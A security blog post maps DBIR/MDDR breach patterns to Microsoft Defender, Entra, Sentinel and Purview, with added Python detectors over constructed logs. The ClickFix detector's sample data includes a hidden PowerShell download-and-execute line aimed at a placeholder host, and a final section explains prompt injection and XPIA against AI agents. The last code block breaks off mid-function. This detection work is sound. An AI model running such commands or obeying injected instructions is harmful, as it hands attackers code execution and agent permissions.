
The Top 10 Threats Breaching Organizations Right Now — and the Microsoft Stack to Detect Them

The 2025 DBIR and MDDR document 10 breach patterns hitting organizations hardest, plus one emerging AI agent attack vector SOCs need to start preparing for now. Here's the Microsoft detection stack mapped to each threat.

Tags: threat detection, Microsoft Defender, SOC, DBIR, credential theft, ransomware

The DBIR analyzed 22,052 incidents. MDDR tracked 30+ billion threat signals daily. If you want to know what's breaking organizations right now, the data is there.

The question is whether your detection stack maps to it.

I've been working through the Verizon 2025 DBIR and Microsoft Digital Defense Report 2025 to map ten breach patterns that show up most often against the Microsoft security product portfolio — plus one forward-looking threat that isn't in the DBIR data yet but needs to be in your planning now. Here's what the data says, and the tools built to catch it.


Threat 1: Infostealer-driven credential theft

The numbers: 22% of DBIR breaches start with stolen credentials. 51% of MDDR incidents reference infostealer activity.

This is the industrialized access market in action. Malware like Lumma Stealer, RedLine, and Vidar drops onto endpoints, usually through malvertising, cracked software, or social engineering. The malware harvests session tokens, plaintext credentials, and browser data. Within hours, that access appears in infostealer marketplaces or gets sold directly to access brokers.

The attack chain typically looks like this:

  1. Infostealer malware executes
  2. Session tokens or plaintext credentials harvested
  3. Federation abuse or pass-the-cookie attacks follow
  4. Attacker operates as a legitimate user

Here's the part that matters for detection: 30% of systems in infostealer data were estimated to be enterprise-licensed devices (DBIR), and 46% of corporate-login devices in that subset were non-managed. Your BYOD and contractor population is a credential harvesting target.

Detect with

Microsoft Defender for Endpoint (MDE) provides behavioral detection for credential access patterns, clipboard-to-shell behavior, unusual browser credential store access, and loader activity that precedes payload delivery.

Entra ID Protection catches the downstream abuse through risky sign-in policies. When an infostealer-harvested token gets used from an unexpected location or device, risk scoring flags it.

Respond with

Token revocation via Conditional Access: force reauthentication when risk is detected. Build a Sentinel playbook for automated remediation: isolate the compromised identity, revoke sessions, trigger password reset, and alert the SOC.
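The detection and response described above, as an added example that is not part of the original article: a small pass-the-cookie detector run over constructed sign-in records. The record fields (`session_id`, `device_id`, `managed`, `asn`, `country`) are simplified stand-ins for sign-in log columns, not the real Entra schema, and the playbook steps mirror the Sentinel remediation sequence in the paragraph above.

```python
"""Token-replay (pass-the-cookie) detection over constructed sign-in records.

Added example, not code from the article. Field names are simplified
assumptions standing in for Entra sign-in log columns; all records are constructed.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: alice's session id reappears hours later from an
# unmanaged device on a different ASN in a different country.
SIGNINS = [
    {"time": "2025-06-01T08:00:00", "user": "alice@example.com", "session_id": "sess-A1",
     "device_id": "laptop-01", "managed": True, "asn": 64500, "country": "US"},
    {"time": "2025-06-01T08:45:00", "user": "alice@example.com", "session_id": "sess-A1",
     "device_id": "laptop-01", "managed": True, "asn": 64500, "country": "US"},
    {"time": "2025-06-01T11:10:00", "user": "alice@example.com", "session_id": "sess-A1",
     "device_id": "", "managed": False, "asn": 64999, "country": "NL"},
    {"time": "2025-06-01T09:00:00", "user": "bob@example.com", "session_id": "sess-B7",
     "device_id": "laptop-02", "managed": True, "asn": 64500, "country": "US"},
    {"time": "2025-06-01T13:00:00", "user": "bob@example.com", "session_id": "sess-B7",
     "device_id": "laptop-02", "managed": True, "asn": 64500, "country": "US"},
]

# A session token legitimately stays on the device that minted it, so these
# three attributes together act as the session's fingerprint.
FINGERPRINT = ("device_id", "asn", "country")


def find_token_replay(records, window=timedelta(hours=24)):
    """Return one finding per session whose fingerprint changes within `window`."""
    by_session = defaultdict(list)
    for r in records:
        by_session[r["session_id"]].append(r)

    findings = []
    for sid, events in by_session.items():
        events.sort(key=lambda r: r["time"])  # ISO-8601 strings sort chronologically
        first = events[0]
        t0 = datetime.fromisoformat(first["time"])
        for e in events[1:]:
            if datetime.fromisoformat(e["time"]) - t0 > window:
                break
            changed = [f for f in FINGERPRINT if e[f] != first[f]]
            if changed:
                findings.append({
                    "user": e["user"],
                    "session_id": sid,
                    "changed": changed,
                    "unmanaged_device": not e["managed"],
                    "seen_at": e["time"],
                })
                break  # one finding per session is enough to trigger response
    return findings


def response_actions(finding):
    """Playbook steps in the order an automated remediation would run them."""
    steps = ["revoke_sessions", "require_reauthentication", "reset_password", "notify_soc"]
    if finding["unmanaged_device"]:
        # Replay came from an unenrolled device: close that door before reauth.
        steps.insert(1, "block_unmanaged_device_access")
    return steps


if __name__ == "__main__":
    for finding in find_token_replay(SIGNINS):
        print(finding, response_actions(finding))
```

Bob's session keeps the same fingerprint for the whole day and produces nothing; alice's session id surfacing from an unmanaged device on a foreign ASN is the replay signature, and the unmanaged flag is what turns a plain session revocation into a device-block-first response.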


Threat 2: Human-operated ransomware

The numbers: 44% of DBIR breaches involve ransomware. MDDR reports an 87% year-over-year increase in human-operated ransomware campaigns.

These aren't automated spray-and-pray attacks. Human-operated ransomware means hands-on-keyboard attackers with weeks of dwell time before encryption. They're moving laterally, hunting for backup systems, identifying domain controllers, and staging data exfiltration.

The kill chain is long. That's the good news — if you catch it early, the ransom never happens.

Average dwell time runs 12 days with average attack length of 58 days (MDDR). 79% of ransomware cases involve at least one remote monitoring and management (RMM) tool for persistence. 40% target hybrid environments, moving between on-premises and cloud.

Detect with

Defender for Endpoint monitors for ransomware behavior: tampering with security solutions, unusual RMM tool usage, encryption activity patterns.

Defender for Identity catches the lateral movement: DCSync attacks, Pass the Hash, Kerberoasting, suspicious replication requests against Active Directory.

The detection sweet spot is the reconnaissance and lateral movement phase, not the encryption phase. By the time ransomware starts encrypting, you're in response mode.

Respond with

Automated isolation via Defender XDR Live Response: contain the compromised endpoint before lateral movement expands.

Build Sentinel incident playbooks for coordinated response: correlate identity compromise with endpoint alerts, disable compromised accounts, and trigger your IR workflow.


Threat 3: Vulnerability exploitation (initial access)

The numbers: 20% of DBIR breaches involve vulnerability exploitation as the initial access vector. That's a 34% year-over-year growth rate.

Here's the part that should worry you: within those exploitation cases, 22% targeted edge devices and VPNs specifically. And the median time to full remediation for edge vulnerabilities is 32 days (DBIR).

That's a 32-day attack window on every critical CVE affecting your perimeter.

Exploitation is landing on edge devices, firewall management interfaces, VPNs, and file transfer systems, exactly the systems that are hardest to patch without taking services offline.

Detect with

Defender for Cloud provides exposure management across your Azure footprint: where are your publicly exposed assets, what vulnerabilities exist, what's the blast radius.

Defender Vulnerability Management prioritizes remediation based on actual threat intelligence. Not every critical CVE is being actively exploited. The ones that are need to jump the queue.

Respond with

Prioritized remediation workflows driven by threat exposure tracking. Just-in-time VM access for high-risk systems reduces the standing attack surface while you work through the patch backlog.

For zero-days and high-exploitation-probability CVEs, compensating controls matter: network segmentation, behavior-based detection for post-exploitation activity, and virtual patching where available.


Threat 4: Business email compromise (BEC)

The numbers: BEC accounts for 21% of DBIR attack outcomes. The FBI estimates annual losses exceed $6.3 billion.

Modern BEC has evolved beyond simple email impersonation. Attackers now use adversary-in-the-middle (AiTM) phishing to bypass MFA entirely by stealing session tokens post-authentication. The user successfully authenticates with their second factor, and the attacker captures the resulting token.

The median BEC loss sits around $50,000, with wire transfer remaining the preferred payout method in 88% of cases (DBIR).

Detect with

Defender for Office 365 with Safe Links and AiTM detection catches phishing campaigns designed to harvest session tokens.

Entra ID Protection flags sign-in anomalies — did the authentication happen on an unexpected device, through an unusual flow, or from a location that doesn't match user behavior?

Respond with

The real answer here is prevention: phishing-resistant MFA policies using FIDO2 or passkeys. AiTM attacks don't work against hardware keys. There's no token to steal when authentication is cryptographically bound to the device.

Layer on Conditional Access device compliance requirements to ensure the authentication happens on a managed, healthy endpoint.


Threat 5: Cloud identity attacks (password spray and brute force)

The numbers: MDDR reports a 23% increase in cloud identity attacks. Password spray is often the first move in a cloud account takeover chain.

The spray pattern has evolved to low-and-slow distribution across IP addresses. DBIR and MDDR both note concentration through specific infrastructure — just 20 autonomous system numbers account for 80% of malicious password spray activity (MDDR).

Detect with

Entra ID Protection risk-based Conditional Access catches spray patterns through AI-driven analysis of authentication data.

Sentinel scheduled analytics rules detect spray patterns that risk scoring alone might miss — particularly low-and-slow activity distributed across accounts over time.

Build custom detection for authentication failures concentrated in specific ASNs or geolocations that match known spray infrastructure.
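The ASN-concentrated, low-and-slow spray detection described in this section, as an added example that is not code from the article. It runs over constructed sign-in records (the ASNs, users and field names are made up for the sample; `50126` is Entra's invalid-username-or-password result code). The logic mirrors what a Sentinel scheduled rule would do: group failures by source ASN, and alert when one ASN touches many accounts with only a couple of attempts each, which is the opposite shape from one user mistyping a password.

```python
"""Low-and-slow password spray detection grouped by source ASN.

Added example, not from the article. Records, users and ASNs are constructed;
field names are simplified stand-ins for sign-in log columns.
"""
from collections import defaultdict

# Constructed sign-ins. ASN 64999 touches six accounts once each, spread over
# eight hours, and finally succeeds against u6. ASN 64500 is the corporate
# egress where one user mistyped a password four times in a row.
SIGNINS = [
    {"time": "2025-06-02T01:05:00", "user": "u1@example.com", "asn": 64999, "result": 50126},
    {"time": "2025-06-02T02:40:00", "user": "u2@example.com", "asn": 64999, "result": 50126},
    {"time": "2025-06-02T04:15:00", "user": "u3@example.com", "asn": 64999, "result": 50126},
    {"time": "2025-06-02T05:50:00", "user": "u4@example.com", "asn": 64999, "result": 50126},
    {"time": "2025-06-02T07:25:00", "user": "u5@example.com", "asn": 64999, "result": 50126},
    {"time": "2025-06-02T09:00:00", "user": "u6@example.com", "asn": 64999, "result": 50126},
    {"time": "2025-06-02T09:01:00", "user": "u6@example.com", "asn": 64999, "result": 0},
    {"time": "2025-06-02T08:00:00", "user": "u1@example.com", "asn": 64500, "result": 50126},
    {"time": "2025-06-02T08:01:00", "user": "u1@example.com", "asn": 64500, "result": 50126},
    {"time": "2025-06-02T08:02:00", "user": "u1@example.com", "asn": 64500, "result": 50126},
    {"time": "2025-06-02T08:03:00", "user": "u1@example.com", "asn": 64500, "result": 50126},
]


def detect_spray(records, min_accounts=5, max_per_account=2, known_spray_asns=frozenset()):
    """Alert per ASN that hits many accounts with few attempts each.

    `known_spray_asns` is a constructed allow-for-escalation list standing in
    for the ASN concentration data the reports describe.
    """
    failures = defaultdict(lambda: defaultdict(int))  # asn -> user -> failed count
    successes = defaultdict(set)                       # asn -> users that succeeded
    for r in records:
        if r["result"] == 0:
            successes[r["asn"]].add(r["user"])
        else:
            failures[r["asn"]][r["user"]] += 1

    alerts = []
    for asn, per_user in failures.items():
        wide = len(per_user) >= min_accounts          # many distinct accounts
        shallow = max(per_user.values()) <= max_per_account  # but few tries each
        if wide and shallow:
            # A success from the same ASN against a sprayed account is a hit,
            # not just an attempt: escalate and name the account.
            hits = sorted(successes[asn] & set(per_user))
            alerts.append({
                "asn": asn,
                "accounts": sorted(per_user),
                "successful_after_spray": hits,
                "severity": "High" if (hits or asn in known_spray_asns) else "Medium",
            })
    return alerts


if __name__ == "__main__":
    for alert in detect_spray(SIGNINS, known_spray_asns={64999}):
        print(alert)
```

The corporate ASN never alerts: one account with four failures is a lockout candidate, not a spray. The threshold pair (`min_accounts`, `max_per_account`) is the tuning knob; the lookback window of the Sentinel rule feeding this logic is what decides how slow a spray can go and still be caught.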

Respond with

MFA enforcement is the baseline. Smart lockout tuning prevents account lockout from legitimate users while blocking attacker attempts.

Named location policies let you block authentication entirely from locations where your organization doesn't operate. If you don't have employees in a given country, there's no reason to accept authentication attempts from there.


Threat 6: Data exfiltration

The numbers: Data exfiltration was present in 80% of MDDR ransomware IR engagements. 82% of ransomware incidents involved data exfiltration before encryption.

This is the shift to double and triple extortion. Attackers steal data first. Even if you have solid backups and don't pay the ransom, they still have that threat over you.

Most exfiltration uses legitimate cloud storage: OneDrive, SharePoint anomalies, external cloud uploads through the browser. Attackers use your own tools against you because that traffic blends with normal business operations.

Detect with

Microsoft Defender for Cloud Apps (MCAS) detects the behavioral anomalies that signal exfiltration: impossible travel, mass downloads, sensitive data movement to external locations, uploads to unsanctioned cloud storage.

Configure policies for file sharing anomalies, bulk download detection, and access to sensitive data repositories outside normal business hours.
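The two policies named just above (bulk download detection and off-hours access to sensitive repositories), as an added example that is not code from the article. The download history, access events and site names are constructed, and the baseline method (mean plus three standard deviations, with an absolute floor so a quiet user's tiny baseline doesn't alert on ordinary work) is my choice, not a documented Defender for Cloud Apps algorithm.

```python
"""Exfiltration signals over constructed cloud-app activity: per-user download
baselines and off-hours access to sensitive repositories.

Added example, not from the article; all data and field names are constructed.
"""
from datetime import datetime
from statistics import mean, pstdev

# Constructed: downloads per user per day over the prior week, then today's count.
DOWNLOAD_HISTORY = {
    "alice@example.com": [12, 15, 10, 14, 11],
    "bob@example.com": [20, 25, 22, 19, 24],
}
TODAY_DOWNLOADS = {"alice@example.com": 210, "bob@example.com": 30}

# Constructed file-access events; `sensitive` is the repository's data label.
ACCESS_EVENTS = [
    {"time": "2025-06-03T14:30:00", "user": "bob@example.com", "site": "Finance-Q2", "sensitive": True},
    {"time": "2025-06-03T23:40:00", "user": "alice@example.com", "site": "Finance-Q2", "sensitive": True},
    {"time": "2025-06-03T23:45:00", "user": "alice@example.com", "site": "Cafeteria-Menu", "sensitive": False},
]


def mass_download_alerts(history, today, sigma=3.0, min_absolute=50):
    """Flag users whose download count today exceeds their own baseline.

    threshold = max(mean + sigma * stdev, min_absolute): the floor stops a user
    who normally downloads two files from alerting on ten.
    """
    alerts = []
    for user, count in today.items():
        base = history.get(user, [])
        if len(base) < 3:
            continue  # too little baseline; new-user policy handles this case
        threshold = max(mean(base) + sigma * pstdev(base), min_absolute)
        if count > threshold:
            alerts.append({"user": user, "downloads": count, "threshold": round(threshold, 1)})
    return alerts


def off_hours_sensitive_access(events, start_hour=7, end_hour=19):
    """Return sensitive-repository accesses outside [start_hour, end_hour)."""
    hits = []
    for e in events:
        hour = datetime.fromisoformat(e["time"]).hour
        if e["sensitive"] and not (start_hour <= hour < end_hour):
            hits.append({"user": e["user"], "site": e["site"], "time": e["time"]})
    return hits


if __name__ == "__main__":
    print(mass_download_alerts(DOWNLOAD_HISTORY, TODAY_DOWNLOADS))
    print(off_hours_sensitive_access(ACCESS_EVENTS))
```

Both functions are per-user: the point of a baseline is that bob's 30 downloads are normal for bob, while alice's 210 against a baseline around 12 is the mass-download pattern worth a session-control response.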

Respond with

Microsoft Purview DLP policies enforce data protection at the point of exfiltration: block sensitive data from leaving through unauthorized channels.

MCAS session control via app conditional access lets you apply real-time policies: monitor and restrict file downloads in browser sessions, require step-up authentication for sensitive operations.


Threat 7: Third-party and access broker exploitation

The numbers: Third-party involvement in breaches doubled from 15% to 30% year-over-year (DBIR). MDDR tracks 368 active access brokers operating across 68 industries and 131 countries.

Access brokers have industrialized the initial compromise phase. They specialize in breaching environments and selling persistent access to ransomware operators, data extortion groups, and espionage actors. 80% of access methods sold involve credential-based attacks (MDDR), often bundled with reconnaissance data about the target environment.

The median time to remediate leaked secrets in GitHub repositories is 94 days (DBIR). That's 94 days where your API keys, service account credentials, or connection strings are available to anyone who finds them.

Detect with

Microsoft Entra External Identities with guest access review lets you track third-party access to your environment. Who has access, what can they reach, when did they last use it?

Privileged Identity Management (PIM) for vendor access enforces just-in-time elevation. Vendors don't maintain standing privileged access.

Build a Sentinel custom workbook for third-party sign-in anomalies: unusual access times, geographic anomalies, first-time access to sensitive resources.

Respond with

Automated guest access expiry: third-party accounts require periodic renewal, not indefinite persistence.

Quarterly access reviews via Entra keep external access validated and appropriately scoped.

Threat 8: ClickFix and AI-facilitated social engineering

ClickFix is a technique, not a tool. The attacker lures a user to a counterfeit CAPTCHA or browser error page and instructs them to paste a clipboard-injected command into a Run dialog or PowerShell prompt. There is no file download, no browser warning, no email attachment. The payload executes directly from the clipboard in the user's context.

This technique accounts for 47% of MDDR-tracked initial access incidents categorized under social engineering. Deepfake voice manipulation — where attackers clone an executive's voice for wire transfer approval calls or fabricated video meetings — falls under the same AI-facilitated category.

Detect with

Enable PowerShell Script Block Logging (Event ID 4104) across all endpoints. Pair it with Microsoft Defender for Office 365 Safe Links for URL inspection before a user reaches a lure page, and add Sentinel analytics rules targeting clipboard-paste execution patterns from unusual parent processes.
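The "clipboard-paste execution from unusual parent processes" rule, as an added example that is not code from the article. It scores constructed process-creation events the way an analytics rule would: an interpreter whose parent is the Run dialog's shell (explorer.exe) or a browser earns a base score, and each command-line trait typical of pasted lures (hidden window, no profile, encoded command, download cradle, remote URL) adds to it. The event fields are simplified stand-ins for endpoint telemetry and the URL is a placeholder.

```python
"""ClickFix-style execution detection over constructed endpoint process events.

Added example, not from the article. Event fields are simplified stand-ins for
process-creation telemetry; command lines are constructed, the URL is a placeholder.
"""
import re

# Parents that mean "a human pasted this": the shell behind the Run dialog,
# or a browser that displayed the lure page.
INTERACTIVE_PARENTS = {"explorer.exe", "chrome.exe", "msedge.exe", "firefox.exe"}
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe"}
LOLBIN_BONUS = {"mshta.exe", "wscript.exe", "cscript.exe"}  # rarely typed by real users

# Each marker is a regex evaluated against the lower-cased command line.
MARKERS = {
    "encoded_command": r"-e(nc|c|ncodedcommand)?\b",
    "hidden_window": r"-w(indowstyle)?\s+hidden",
    "no_profile": r"-nop(rofile)?\b",
    "invoke_expression": r"\biex\b|invoke-expression",
    "download_cradle": r"\b(irm|iwr)\b|invoke-restmethod|invoke-webrequest|downloadstring",
    "remote_url": r"https?://",
}

# Constructed events: one pasted lure, one mshta launched from a browser,
# one scheduled admin script, one user opening a console, one unrelated app.
EVENTS = [
    {"host": "WS01", "user": "jdoe", "parent": "explorer.exe", "process": "powershell.exe",
     "cmdline": '-nop -w hidden -c "irm http://PLACEHOLDER.invalid/x | iex"'},
    {"host": "WS02", "user": "asmith", "parent": "msedge.exe", "process": "mshta.exe",
     "cmdline": "http://PLACEHOLDER.invalid/verify"},
    {"host": "SRV01", "user": "svc-backup", "parent": "cmd.exe", "process": "powershell.exe",
     "cmdline": r"-ExecutionPolicy Bypass -File C:\Scripts\nightly-backup.ps1"},
    {"host": "WS03", "user": "admin1", "parent": "explorer.exe", "process": "powershell.exe",
     "cmdline": ""},
    {"host": "WS03", "user": "admin1", "parent": "explorer.exe", "process": "notepad.exe",
     "cmdline": "notes.txt"},
]


def score_event(event):
    """Return (score, reasons) for one process-creation event."""
    parent = event["parent"].lower()
    child = event["process"].lower()
    cmd = event["cmdline"].lower()
    if child not in INTERPRETERS:
        return 0, []
    score, reasons = 0, []
    if parent in INTERACTIVE_PARENTS:
        score += 2
        reasons.append(f"parent:{parent}")
    if child in LOLBIN_BONUS:
        score += 1
        reasons.append(f"lolbin:{child}")
    for name, pattern in MARKERS.items():
        if re.search(pattern, cmd):
            score += 1
            reasons.append(name)
    return score, reasons


def detect_clickfix(events, threshold=3):
    """Alert on events whose score reaches `threshold`; reasons explain why."""
    alerts = []
    for e in events:
        score, reasons = score_event(e)
        if score >= threshold:
            alerts.append({"host": e["host"], "user": e["user"], "process": e["process"],
                           "score": score, "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for alert in detect_clickfix(EVENTS):
        print(alert)
```

The scoring keeps the admin's scheduled script and a user simply opening a console below threshold, while the two lure shapes clear it comfortably; the `reasons` list is what you'd surface in the alert so the analyst sees which traits fired. Event 4104 script block content is the natural second signal to join on once this rule fires.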


Threat 9: Software supply chain attacks

Modern attacks are targeting the development pipeline rather than the production environment. CI/CD system compromise, dependency poisoning, and artifact registry tampering are all active patterns documented in MDDR.

CDK Global's cascading impact on automotive dealership software. Change Healthcare's dependency compromise. A single build server or poisoned package registry can reach dozens of downstream organizations before the attack is detected. Median time to detect a supply chain compromise is significantly longer than a direct breach because the entry point is trusted infrastructure.

Detect with

Run GitHub Advanced Security with software composition analysis in every pipeline, use Defender for Cloud for CVE visibility on build infrastructure, and monitor artifact registries for unexpected package updates, version anomalies, or signature changes.
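The registry monitoring described above, as an added example that is not code from the article: a drift check between two snapshots of package metadata that flags signer changes, version regressions, a digest that changed under an unchanged version, new maintainers, and packages that appeared or vanished. Package names, versions, digests and signer names are constructed placeholders; the snapshot shape is an assumption, not any registry's real export format.

```python
"""Artifact registry drift check between two constructed metadata snapshots.

Added example, not from the article. Package names, versions, digests and
signers are placeholders; the snapshot format is an assumption.
"""

TRUSTED_SIGNERS = {"CN=Acme Build CA"}

PREVIOUS = {
    "acme-auth": {"version": "2.4.1", "sha256": "sha256:PLACEHOLDER-A", "signer": "CN=Acme Build CA",
                  "maintainers": {"build-bot"}},
    "acme-http": {"version": "1.9.0", "sha256": "sha256:PLACEHOLDER-B", "signer": "CN=Acme Build CA",
                  "maintainers": {"build-bot"}},
    "acme-util": {"version": "0.8.3", "sha256": "sha256:PLACEHOLDER-C", "signer": "CN=Acme Build CA",
                  "maintainers": {"build-bot"}},
}

CURRENT = {
    # Bumped version, but signed by a certificate the registry has never seen.
    "acme-auth": {"version": "2.4.2", "sha256": "sha256:PLACEHOLDER-D", "signer": "CN=Unknown Signer",
                  "maintainers": {"build-bot"}},
    # Version went backwards: a republished older build or a downgrade.
    "acme-http": {"version": "1.8.9", "sha256": "sha256:PLACEHOLDER-E", "signer": "CN=Acme Build CA",
                  "maintainers": {"build-bot"}},
    # Same version string, different bytes, plus a maintainer nobody approved.
    "acme-util": {"version": "0.8.3", "sha256": "sha256:PLACEHOLDER-F", "signer": "CN=Acme Build CA",
                  "maintainers": {"build-bot", "new-person"}},
    # Package that did not exist in the last snapshot.
    "acme-telemetry": {"version": "0.1.0", "sha256": "sha256:PLACEHOLDER-G", "signer": "CN=Acme Build CA",
                       "maintainers": {"build-bot"}},
}


def parse_version(v):
    """Tuple for ordering; non-numeric parts sort lowest (pre-release style)."""
    return tuple(int(p) if p.isdigit() else -1 for p in v.split("."))


def registry_drift(previous, current, trusted_signers):
    """Return sorted (package, finding) pairs describing what changed."""
    findings = []
    for name, cur in current.items():
        prev = previous.get(name)
        if prev is None:
            findings.append((name, "new_package"))
            continue
        if cur["signer"] != prev["signer"] or cur["signer"] not in trusted_signers:
            findings.append((name, "signer_changed"))
        if parse_version(cur["version"]) < parse_version(prev["version"]):
            findings.append((name, "version_regression"))
        if cur["version"] == prev["version"] and cur["sha256"] != prev["sha256"]:
            findings.append((name, "digest_changed_same_version"))
        added = cur["maintainers"] - prev["maintainers"]
        if added:
            findings.append((name, "new_maintainer:" + ",".join(sorted(added))))
    for name in previous.keys() - current.keys():
        findings.append((name, "package_removed"))
    return sorted(findings)


if __name__ == "__main__":
    for package, finding in registry_drift(PREVIOUS, CURRENT, TRUSTED_SIGNERS):
        print(f"{package}: {finding}")
```

A digest that changes while the version string stays the same is the finding to treat most seriously: a legitimate rebuild bumps the version, so immutable-version policy on the registry plus this check catches a silently swapped artifact before a pipeline pulls it.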


Threat 10: Insider threats and privileged user abuse

Internal actors appeared in 19% of DBIR breaches. The category covers malicious insiders, compromised privileged accounts, and users bypassing security controls for convenience. All three produce similar telemetry patterns: unusual data access volume, credential escalation outside business hours, unexpected export operations.

MDDR flags overprivileged accounts as a primary amplifier. Shared admin credentials and standing privileged access create unnecessary blast radius even when the actor behind the access has no malicious intent. The stolen credential is only as dangerous as the permissions it carries.

Detect with

Microsoft Purview Insider Risk Management with HR data integration — termination dates and manager-flagged performance triggers provide the highest-fidelity signals for identifying at-risk periods. Entra Privileged Identity Management for all privileged roles with no standing access. Alert on PIM activation patterns outside business hours or without a preceding incident or change ticket.
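The PIM activation review described above, as an added example that is not code from the article. It runs over constructed activation records and an equally constructed set of open tickets: an activation outside business hours or on a weekend is flagged, and an activation whose justification carries no ticket reference, or references a ticket that isn't open, is escalated. The justification format (`CHG-` / `INC-` prefixes) and business-hours window are assumptions for the sample.

```python
"""PIM activation review: flag privileged-role activations outside business
hours or without a reference to an open change or incident ticket.

Added example, not from the article. Activation records, ticket ids and the
justification format are constructed assumptions.
"""
import re
from datetime import datetime

OPEN_TICKETS = {"CHG-1001", "INC-2002"}
TICKET_RE = re.compile(r"\b(?:CHG|INC)-\d+\b")

# Constructed activations. 2025-06-07 is a Saturday; the rest are weekdays.
ACTIVATIONS = [
    {"time": "2025-06-03T14:00:00", "user": "alice@example.com",
     "role": "Global Administrator", "justification": "CHG-1001 patch domain controllers"},
    {"time": "2025-06-07T02:30:00", "user": "bob@example.com",
     "role": "Exchange Administrator", "justification": "INC-2002 mail flow outage"},
    {"time": "2025-06-04T15:00:00", "user": "carol@example.com",
     "role": "Global Administrator", "justification": "quick fix"},
    {"time": "2025-06-04T23:10:00", "user": "dave@example.com",
     "role": "Security Administrator", "justification": "CHG-9999 cleanup"},
]


def review_activation(activation, open_tickets, start_hour=7, end_hour=19):
    """Return (reasons, severity); severity is None when nothing is wrong."""
    t = datetime.fromisoformat(activation["time"])
    reasons = []
    if t.weekday() >= 5 or not (start_hour <= t.hour < end_hour):
        reasons.append("off_hours")
    refs = TICKET_RE.findall(activation["justification"])
    if not refs:
        reasons.append("no_ticket_reference")
    elif not any(r in open_tickets for r in refs):
        reasons.append("ticket_not_open")  # referenced, but closed or unknown

    if "no_ticket_reference" in reasons or "ticket_not_open" in reasons:
        severity = "High"   # elevation with no authorised work item behind it
    elif reasons:
        severity = "Medium"  # legitimate ticket, unusual hour: verify with the on-call
    else:
        severity = None
    return reasons, severity


def flag_activations(activations, open_tickets):
    """Keep only activations that raised at least one reason."""
    flagged = []
    for a in activations:
        reasons, severity = review_activation(a, open_tickets)
        if reasons:
            flagged.append({"user": a["user"], "role": a["role"],
                            "reasons": reasons, "severity": severity})
    return flagged


if __name__ == "__main__":
    for item in flag_activations(ACTIVATIONS, OPEN_TICKETS):
        print(item)
```

Bob's weekend activation against an open incident is the case to keep at Medium: the SOC confirms it against the on-call roster rather than treating it as compromise, while an activation nobody can tie to a work item gets the investigation.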


Bonus — AI agent infrastructure attacks: prepare now

The ten threats above are all documented in the 2025 DBIR and MDDR data cycle. This one is different.

T11 is not a SOC-specific threat. It is an organizational threat that SOC teams are responsible for detecting and responding to — across every agent deployment in the tenant, not just the agents the SOC operates directly.

Organizations are deploying AI agents faster than detection coverage is being built for them. M365 Copilot agents with access to SharePoint, Teams, and email. Business process agents approving invoices, processing HR data, placing procurement orders. Development agents with repository and CI/CD access. Multi-agent orchestration workflows where a compromised orchestrator can poison every downstream agent in the chain. Each of these creates an attack surface the SOC owns but didn't deploy.

Two documented attack patterns are already active across this broader surface. Prompt injection from external content, where adversarial instructions embedded in a document, email, SharePoint file, or pull request comment attempt to redirect agent behavior. And cross-prompt injection attacks (XPIA), where adversarial content embedded in objects the agent reads during its work — a username, a calendar event, an invoice description, a file name — overrides the agent's operational instructions and produces a manipulated output.

The attack doesn't need to defeat security controls. It just needs to reach the agent's context window through a trusted data source. An XPIA payload in a shared document redirects a Copilot agent with M365 delegated permissions. A poisoned pull request comment redirects a coding agent with repo write access. The agent's own authorized identity becomes the attack vector — no credential theft required.

The blast radius compounds in multi-agent workflows. When agents call other agents, a compromised orchestrator can poison downstream agent behavior across the entire chain. The exposure isn't one service principal. It's every agent the orchestrator reaches.

Detect with

Microsoft Purview unified audit logs include dedicated event types for AI agent activity: XPIADetected and JailbreakDetected, both generally available. These fire across all Microsoft AI agent surfaces — Copilot, custom agents, and third-party agents integrated via the Microsoft AI safety stack. Log these. Alert on them. Treat any positive as a P2 investigation.

For every agent service principal in your tenant: run blast radius analysis in Microsoft Sentinel before deployment. Inventory all agent identities, apply Entra PIM just-in-time access, and remove any permission the agent doesn't need for its specific function. And never close a security incident based solely on an AI agent verdict — cross-reference agent output against source telemetry before acting on any conclusion.
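The blast-radius analysis and the XPIADetected / JailbreakDetected triage described in this section, as an added example that is not code from the article. The agent inventory, permission scope names, the orchestrator-to-agent call graph and the audit-record field names (`Operation`, `AgentId`, `CreationTime`) are constructed assumptions; only the two event names come from the article. Blast radius is computed transitively, so a hit on an orchestrator inherits every scope of every agent it can reach, which is the multi-agent compounding the text describes.

```python
"""Agent blast-radius analysis and triage of XPIADetected / JailbreakDetected events.

Added example, not from the article. Inventory, scopes, call graph and audit
field names are constructed assumptions; the event names come from the article.
"""
from collections import deque

# Constructed agent inventory: scopes each agent identity holds, and which
# other agents it calls in a workflow.
AGENTS = {
    "orchestrator-01": {"scopes": {"Mail.Read", "Sites.Read.All"}, "calls": ["invoice-bot", "hr-bot"]},
    "invoice-bot": {"scopes": {"Sites.ReadWrite.All", "Mail.Send"}, "calls": []},
    "hr-bot": {"scopes": {"User.Read.All"}, "calls": []},
    "summarizer": {"scopes": {"Files.Read"}, "calls": []},
}

# Substrings that mark a scope as able to change or send something.
WRITE_MARKERS = ("ReadWrite", "Write", ".Send")

# Constructed audit records in the shape of a unified audit log export.
AUDIT_RECORDS = [
    {"Operation": "XPIADetected", "AgentId": "orchestrator-01", "CreationTime": "2025-06-05T10:02:00"},
    {"Operation": "CopilotInteraction", "AgentId": "summarizer", "CreationTime": "2025-06-05T10:03:00"},
    {"Operation": "JailbreakDetected", "AgentId": "summarizer", "CreationTime": "2025-06-05T10:04:00"},
]

ALERTING_OPERATIONS = {"XPIADetected", "JailbreakDetected"}


def reachable_agents(agent_id, inventory):
    """Breadth-first walk of the call graph, including the starting agent."""
    seen, queue = {agent_id}, deque([agent_id])
    while queue:
        for nxt in inventory[queue.popleft()]["calls"]:
            if nxt not in seen:
                seen.add(nxt)
                queue.append(nxt)
    return seen


def blast_radius(agent_id, inventory):
    """Union of scopes across every agent the given one can reach."""
    reach = reachable_agents(agent_id, inventory)
    scopes = set().union(*(inventory[a]["scopes"] for a in reach))
    write_scopes = sorted(s for s in scopes if any(m in s for m in WRITE_MARKERS))
    return {"agents": sorted(reach), "scopes": sorted(scopes), "write_scopes": write_scopes}


def triage(records, inventory):
    """Turn alerting audit events into incidents, sized by blast radius.

    Baseline is P2 per the guidance above; a compromised context that can reach
    a write or send scope is raised to P1.
    """
    incidents = []
    for r in records:
        if r["Operation"] not in ALERTING_OPERATIONS:
            continue
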